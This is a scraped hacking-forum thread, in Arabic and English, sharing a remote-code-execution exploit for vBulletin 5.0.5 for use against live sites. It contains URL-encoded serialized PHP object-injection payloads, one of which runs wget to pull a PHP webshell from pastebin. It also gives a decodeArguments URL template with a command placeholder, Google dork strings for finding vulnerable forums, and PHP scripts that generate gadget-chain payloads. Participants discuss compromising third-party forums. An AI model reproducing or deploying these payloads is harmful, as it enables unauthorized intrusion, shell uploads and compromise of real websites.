Loading...

BTC Address to donate : [[address]]

Donation of [[value]] BTC Received. Thank You.
[[error]]

6 أعضاء قالوا شكراً لـ CrashBandicot على المشاركة المفيدة:
CrashBandicot عضو جديد
  • شكراً: 19
  • تم شكره 29 مرة في 8 مشاركة

Upload Uploader

كود:
O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2A%00db%22%3BO%3A11%3A%22vB_Database%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A6%3A%22system%22%3B%7D%7Ds%3A12%3A%22%00%2A%00recordset%22%3Bs%3A54%3A%22wget+http%3A%2F%2Fpastebin.com%2Fraw.php%3Fi%3DRnXN0cmY+-O+s4e.php%22%3B%7D

توقيع
الأعضاء الذين قالوا شكراً لـ CrashBandicot على المشاركة المفيدة:
Azeros عضو جديد
  • شكراً: 1
  • تم شكره 0 مرة في 0 مشاركة

can't understand how to select the vulnerable website ?

CrashBandicot عضو جديد
  • شكراً: 19
  • تم شكره 29 مرة في 8 مشاركة

intext:"Powered by vBulletin 5.0.5"
intext:"Powered by vBulletin Version 5.0.5"

توقيع
Azeros عضو جديد
  • شكراً: 1
  • تم شكره 0 مرة في 0 مشاركة

المشاركة الأصلية كتبت بواسطة CrashBandicot اقتباس :
intext:"Powered by vBulletin 5.0.5"
intext:"Powered by vBulletin Version 5.0.5"
i mean while exploiting , for exemple you exploited :forum.ironkey.com
can you tell me wich site im working on if use this استبدال script , can't find a way to work on a specified website , understand me ? thanks

MAXIDROL :: عضو خاص ::
  • شكراً: 80
  • تم شكره 526 مرة في 68 مشاركة

المشاركة الأصلية كتبت بواسطة Azeros اقتباس :
i mean while exploiting , for exemple you exploited :forum.ironkey.com
can you tell me wich site im working on if use this استبدال script , can't find a way to work on a specified website , understand me ? thanks
كود:
http://127.0.0.1/vbforum/ajax/api/hook/decodeArguments?arguments=O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2a%00db%22%3BO%3A11%3A%22vB_Database%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A7%3A%22{CMD}%22%3B%7D%7Ds%3A12%3A%22%00%2a%00recordset%22%3Bi%3A1%3B%7D
replace {CMD} by the command that you want to executed, for example phpinfo

Azeros عضو جديد
  • شكراً: 1
  • تم شكره 0 مرة في 0 مشاركة

المشاركة الأصلية كتبت بواسطة MAXIDROL اقتباس :
كود:
http://127.0.0.1/vbforum/ajax/api/hook/decodeArguments?arguments=O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2a%00db%22%3BO%3A11%3A%22vB_Database%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A7%3A%22{CMD}%22%3B%7D%7Ds%3A12%3A%22%00%2a%00recordset%22%3Bi%3A1%3B%7D
replace {CMD} by the command that you want to executed, for example phpinfo
sorry i dont mean that , i mean wich site i have infected using the exploit ! is the any way i know wich site im working on , like for exemple when i run the استبدال script the site:exemple.com has been exploited !
hope you understand me , how he has exploited ironkey.com where can i exploit a specified site thanks

Azeros عضو جديد
  • شكراً: 1
  • تم شكره 0 مرة في 0 مشاركة

المشاركة الأصلية كتبت بواسطة CrashBandicot اقتباس :
Upload Uploader
كود:
O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2A%00db%22%3BO%3A11%3A%22vB_Database%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A6%3A%22system%22%3B%7D%7Ds%3A12%3A%22%00%2A%00recordset%22%3Bs%3A54%3A%22wget+http%3A%2F%2Fpastebin.com%2Fraw.php%3Fi%3DRnXN0cmY+-O+s4e.php%22%3B%7D
all the commands works perfectly , but this one doesn't any other one to upload a shell ?

CrashBandicot عضو جديد
  • شكراً: 19
  • تم شكره 29 مرة في 8 مشاركة

Update other method :

كود PHP:
<?php
class vB_Database_MySQL {
   public 
$functions = array();
   public function 
__construct() {
           
$this->functions['free_result'] = 'assert';
   }
}
 
class 
vB_dB_Result {
   protected 
$db;
   protected 
$recordset;
   public function 
__construct() {
           
$this->db = new vB_Database_MySQL();
           
$this->recordset 'print(\'Hello world!\')';
   }
}
 
 
print 
urlencode(serialize(new vB_dB_Result())) . "\n";
 
?>


كود PHP:
<?php
    
class vB5_Template {
        public 
$tmpfile;
        protected 
$template;
        protected 
$registered = array();
        public function 
__construct() {
            
$this->template 'widget_php';
            
$this->registered['widgetConfig'] = array('code' => 'print_r(\'hello sec4ever\');die();');
       }
    }
 
    class 
vB_View_AJAXHTML {
        public 
$tmpfile;
        protected 
$content;
        public function 
__construct() {
            
$this->content = new vB5_Template();
       }
    }
 
    class 
vB_vURL {
        public 
$tmpfile;
        public function 
__construct() {
            
$this->tmpfile = new vB_View_AJAXHTML();
        }
    }
 
    print 
urlencode(serialize(new vB_vURL())) . "\n";
    
?>

توقيع
الأعضاء الذين قالوا شكراً لـ CrashBandicot على المشاركة المفيدة: